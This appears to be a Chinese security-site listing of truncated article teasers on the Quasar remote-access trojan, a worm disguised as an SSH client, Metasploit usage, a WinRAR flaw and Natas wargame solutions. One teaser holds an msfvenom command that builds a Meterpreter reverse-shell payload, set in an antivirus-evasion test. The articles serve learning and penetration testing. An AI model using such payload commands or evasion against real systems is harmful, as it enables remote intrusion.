*本工具仅供技术分享、交流讨论，严禁用于非法用途。Quasar使用Quasar是一个简易的木马管理工具https://github.com/quasar/Quasar/releases/tag/v1.4.0这里可以先下载，之后运...

引言随着互联网架构的高速发展，信息安全越来越受到社会的关注，发展越来越标准化、流程化。在如今的渗透攻击和测试中，个人自身完成一整套渗透攻击链已变的越来越困难，于是，在各个...

0x01 环境搭建测试系统:windows10 (1909)杀毒软件：360安全卫士在线杀毒：VT0x02 payload生成msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -...

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！本文旨在激发像我一样自学渗透测试的小白对于...

TEA是一款基于TAS框架的SSH客户端蠕虫，从本质上说，它是一个仿冒的SSH客户端，它能够修改tty输入/输出来实现任意命令执行，或通过SSH连接来上传自身以实现渗透感染。为了实现该工...

TAS是一款轻量级框架，在它的帮助下，研究人员可以轻松修改tty并创建伪造的代码。该框架拥有三个主要函数，即tas_execv、tas_forkpty和tas_tty_loop：1、tas_execv：这个函数的作用跟...

原创：合天网安实验室合天智汇在前面，我们学习了msf5 > services -c port,info -p 139,445 192.168.177.145           Services                          ...

原创：合天智汇0x01前言玩IoT安全的小伙伴必不可少的一项技能就是查datasheet，配合IDA等调试器的分析，本文以STM32F405BootLoader为例，简单的介绍了相关的分析流程。0x02准备工作...

原创： 合天网安实验室 合天智汇  之前有跟大家分享msf5 auxiliary(gather/enum_dns) > info //查看模块信息       Name: DNS Record Scanner and Enumer...

原创： 合天网安实验室 合天智汇 在本章中，我们将会学习以下内容： 1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级...

原创： Yale 合天智汇 1、Metasploit- Payload简单来说，Payload是黑客用来与被黑了的系统交互的简单脚本。使用payload，可以将数据传输到已经沦陷的系统。Metasploit有效载荷...

*本文作者：艾登——皮尔斯，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。前言Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安...

前言： Natas是一个教授服务器端Web安全基础知识的 wargame，通过在每一关寻找Web安全漏洞，来获取通往下一关的秘钥，适合新手入门Web安全。传送门~ 接下来给大家分享一下，1-20题...

OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合学习Web安全基础的游戏，在Natas 中，我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一个网站，类似 ht...

原创：

原创：

在安全领域的攻击方面，我个人非常尊敬反病毒软件行业的研究员和工程师，和那些专注于投资反病毒软件的公司们。如果说恶意软件开发是一场猫鼠游戏，那么我会说这个行业创造了最可...

前言经常用Metasploit反弹shell的小伙伴应该都知道在外网有 一台Metasploit是一件多么奢侈的事情~然而一台性能不错的云主机价格大都不菲，并且自己本地高性能的Metasploit用...